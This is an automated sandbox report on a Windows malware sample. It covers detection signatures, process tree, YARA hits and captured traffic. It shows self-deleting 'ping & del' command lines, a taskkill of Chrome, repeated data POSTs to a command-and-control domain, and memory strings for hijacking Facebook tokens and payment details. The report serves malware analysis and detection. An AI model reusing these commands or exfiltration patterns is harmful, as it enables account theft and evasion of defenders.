Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report IpB8f8qwze.exe

Overview

General Information

Sample Name:IpB8f8qwze.exe
Analysis ID:364295
MD5:1b59fc1a89c1bc88ea4e1b26da579120
SHA1:6d1eb3583826aa70f437aba38beee8b787c2da7f
SHA256:6a9b454b620677ea11f4f69156969468b0f43ebdfe27dabfb0cf16572f9379eb
Tags:exe
Infos:

Most interesting Screenshot:

Detection

Score:90
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Hides threads from debuggers
Installs new ROOT certificates
PE file has a writeable .text section
Registers a new ROOT certificate
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a Chrome extension
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file contains strange resources
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Startup

  • System is w10x64
  • IpB8f8qwze.exe (PID: 6500 cmdline: 'C:\Users\user\Desktop\IpB8f8qwze.exe' MD5: 1B59FC1A89C1BC88EA4E1B26DA579120)
    • msiexec.exe (PID: 6560 cmdline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • 83C12B0D0FA88B10.exe (PID: 6636 cmdline: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe 0011 user01 MD5: 1B59FC1A89C1BC88EA4E1B26DA579120)
      • 1615173766196.exe (PID: 6972 cmdline: 'C:\Users\user\AppData\Roaming\1615173766196.exe' /sjson 'C:\Users\user\AppData\Roaming\1615173766196.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)
      • ThunderFW.exe (PID: 7156 cmdline: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' MD5: F0372FF8A6148498B19E04203DBB9E69)
      • cmd.exe (PID: 4920 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 204 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • 83C12B0D0FA88B10.exe (PID: 6704 cmdline: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe 200 user01 MD5: 1B59FC1A89C1BC88EA4E1B26DA579120)
      • cmd.exe (PID: 7012 cmdline: cmd.exe /c taskkill /f /im chrome.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 4632 cmdline: taskkill /f /im chrome.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • cmd.exe (PID: 6136 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 5456 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • cmd.exe (PID: 6736 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\IpB8f8qwze.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 6776 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
  • msiexec.exe (PID: 6652 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 0E9F5C63C593DB0A234ED10779F63A5A C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.310468368.0000000002720000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x26484:$x1: cmd /c ping 127.0.0.1 -n
00000000.00000002.258774447.00000000027B0000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x26484:$x1: cmd /c ping 127.0.0.1 -n
00000004.00000002.275254387.0000000002650000.00000040.00000001.sdmpPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x26484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

SourceRuleDescriptionAuthorStrings
4.2.83C12B0D0FA88B10.exe.2650000.5.raw.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x26484:$x1: cmd /c ping 127.0.0.1 -n
0.2.IpB8f8qwze.exe.10000000.7.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x26484:$x1: cmd /c ping 127.0.0.1 -n
2.2.83C12B0D0FA88B10.exe.2720000.3.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x26484:$x1: cmd /c ping 127.0.0.1 -n
0.2.IpB8f8qwze.exe.27b0000.5.raw.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x26484:$x1: cmd /c ping 127.0.0.1 -n
4.2.83C12B0D0FA88B10.exe.2650000.5.unpackPing_Command_in_EXEDetects an suspicious ping command execution in an executableFlorian Roth
  • 0x26484:$x1: cmd /c ping 127.0.0.1 -n
Click to see the 6 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: 9A3A97F6F45F2C2B.comVirustotal: Detection: 8%Perma Link
Source: 9a3a97f6f45f2c2b.comVirustotal: Detection: 8%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeMetadefender: Detection: 16%Perma Link
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeReversingLabs: Detection: 37%
Multi AV Scanner detection for submitted fileShow sources
Source: IpB8f8qwze.exeVirustotal: Detection: 46%Perma Link
Source: IpB8f8qwze.exeMetadefender: Detection: 16%Perma Link
Source: IpB8f8qwze.exeReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_00413970 DecryptFileW,0_2_00413970
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_004129F9 CryptHashPublicKeyInfo,GetLastError,0_2_004129F9
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_0043821C CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,0_2_0043821C
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_00412B6A CryptCATAdminCalcHashFromFileHandle,GetLastError,GetLastError,CryptCATAdminCalcHashFromFileHandle,GetLastError,GetLastError,GetLastError,WinVerifyTrust,WinVerifyTrust,WinVerifyTrust,0_2_00412B6A
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_1001F780 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,0_2_1001F780
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_1001F780 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,2_2_1001F780

Compliance:

barindex
Detected unpacking (creates a PE file in dynamic memory)Show sources
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeUnpacked PE file: 2.2.83C12B0D0FA88B10.exe.2720000.3.unpack
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeUnpacked PE file: 4.2.83C12B0D0FA88B10.exe.2650000.5.unpack
Uses 32bit PE filesShow sources
Source: IpB8f8qwze.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses new MSVCR DllsShow sources
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dllJump to behavior
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: IpB8f8qwze.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbolsShow sources
Source: Binary string: C:\src\wix38\build\ship\x86\burn.pdb source: IpB8f8qwze.exe
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.2.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1615173766196.exe, 00000009.00000000.261008599.000000000040F000.00000002.00020000.sdmp, 1615173766196.exe.2.dr
Source: Binary string: atl71.pdbT source: atl71.dll.2.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.2.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.2.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.2.dr
Source: Binary string: atl71.pdb source: atl71.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.2.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.2.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.2.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000017.00000002.295382420.000000000114C000.00000002.00020000.sdmp, ThunderFW.exe.2.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.2.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.2.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: gdiview.msi.0.dr
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: z:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: x:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: v:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: t:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: r:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: p:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: n:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: l:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: j:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: h:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: f:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: b:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: y:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: w:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: u:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: s:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: q:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: o:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: m:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: k:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: i:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: g:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: e:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: c:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: a:Jump to behavior
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_00436AF7 FindFirstFileW,FindClose,0_2_00436AF7
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_0043740C GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,GetLastError,GetLastError,GetLastError,FindClose,0_2_0043740C
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_00413414 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,0_2_00413414
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_1001A1D0 FindFirstFileA,FindClose,0_2_1001A1D0
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_1001A1D0 FindFirstFileA,FindClose,2_2_1001A1D0
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Jump to behavior

Networking:

barindex
Uses ping.exe to check the status of other devices and networksShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: global trafficHTTP traffic detected: GET /info_old/ddd HTTP/1.1Host: 9A3A97F6F45F2C2B.comAccept: */*
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: global trafficHTTP traffic detected: POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 79Host: 9a3a97f6f45f2c2b.com
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 9a3a97f6f45f2c2b.com
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 9a3a97f6f45f2c2b.com
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 9a3a97f6f45f2c2b.com
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 9a3a97f6f45f2c2b.com
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 9a3a97f6f45f2c2b.com
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 9a3a97f6f45f2c2b.com
Source: global trafficHTTP traffic detected: POST /info_old/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 677Host: 9a3a97f6f45f2c2b.com
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 9a3a97f6f45f2c2b.com
Source: global trafficHTTP traffic detected: POST /info_old/g HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 1393Host: 9a3a97f6f45f2c2b.com
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 9a3a97f6f45f2c2b.com
Source: global trafficHTTP traffic detected: GET /info_old/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: 9a3a97f6f45f2c2b.com
Source: global trafficHTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 9a3a97f6f45f2c2b.com
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_00425ADA InternetReadFile,WriteFile,WriteFile,GetLastError,GetLastError,0_2_00425ADA
Source: global trafficHTTP traffic detected: GET /info_old/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: 9a3a97f6f45f2c2b.com
Source: global trafficHTTP traffic detected: GET /info_old/ddd HTTP/1.1Host: 9A3A97F6F45F2C2B.comAccept: */*
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
